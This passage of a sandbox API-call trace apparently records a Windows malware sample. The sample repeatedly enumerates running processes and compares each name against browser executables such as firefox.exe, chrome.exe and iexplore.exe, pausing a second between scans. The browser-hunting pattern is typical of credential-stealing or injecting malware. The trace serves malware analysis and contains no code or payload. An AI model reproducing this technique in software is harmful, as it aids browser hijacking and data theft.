returned -1 [0226.586] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0226.586] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0226.586] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.586] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.587] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0226.587] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0226.587] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0226.587] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0226.587] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0226.587] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0226.587] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0226.587] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0226.587] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0226.588] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0226.588] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0226.588] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0226.588] CloseHandle (hObject=0xe8) returned 1 [0226.588] Sleep (dwMilliseconds=0x3e8) [0227.597] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0227.599] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.600] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0227.600] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0227.600] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0227.600] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0227.600] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0227.600] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0227.600] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0227.600] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0227.600] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0227.600] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0227.600] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0227.600] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0227.601] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0227.601] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0227.601] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0227.601] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0227.601] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.601] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.602] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0227.602] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0227.602] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0227.602] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0227.602] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.602] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0227.602] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0227.602] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0227.603] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0227.603] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0227.603] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.603] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.603] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0227.603] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0227.603] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0227.603] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0227.603] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.603] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0227.604] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0227.604] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0227.604] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0227.604] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0227.604] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.604] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0227.605] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0227.605] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0227.605] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0227.605] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0227.605] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.605] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0227.605] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0227.605] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0227.605] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0227.606] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0227.606] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.606] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0227.606] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0227.606] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0227.606] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0227.606] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0227.606] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.606] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.607] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.607] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.607] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.607] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0227.607] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.607] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.608] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.608] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.608] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.608] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0227.608] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.608] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.608] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.608] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.608] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.609] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0227.609] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.609] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.609] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.609] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.609] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.609] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0227.609] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.609] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.610] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.610] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.610] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.610] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0227.610] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.610] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0227.611] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0227.611] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0227.611] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0227.611] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0227.611] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.611] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.611] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.611] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.611] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.611] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0227.611] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.611] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.612] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.612] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.612] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.612] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0227.612] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.612] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0227.613] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0227.613] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0227.613] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0227.613] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0227.613] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.613] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0227.613] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0227.613] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0227.613] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0227.613] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0227.613] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.613] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0227.614] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0227.614] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0227.614] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0227.614] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0227.614] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.614] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.614] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0227.614] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0227.614] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0227.614] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0227.614] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.615] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0227.615] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0227.615] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0227.615] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0227.615] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0227.615] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.615] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0227.616] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0227.616] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0227.616] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0227.616] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0227.616] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.616] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0227.616] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0227.616] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0227.616] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0227.616] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0227.616] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.616] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0227.617] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0227.617] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0227.617] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0227.617] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0227.617] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.617] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0227.617] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0227.617] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0227.617] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0227.617] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0227.617] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.617] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0227.618] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0227.618] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0227.618] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0227.618] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0227.618] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.618] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0227.618] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0227.619] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0227.619] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0227.619] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0227.619] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.619] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0227.619] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0227.619] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0227.619] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0227.619] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0227.619] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.619] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0227.620] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0227.620] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0227.620] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0227.620] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0227.620] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.620] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0227.620] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0227.620] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0227.620] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0227.620] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0227.620] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0227.620] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0227.621] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0227.621] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0227.621] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0227.621] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0227.621] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0227.621] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0227.621] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0227.621] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0227.622] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0227.622] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0227.622] 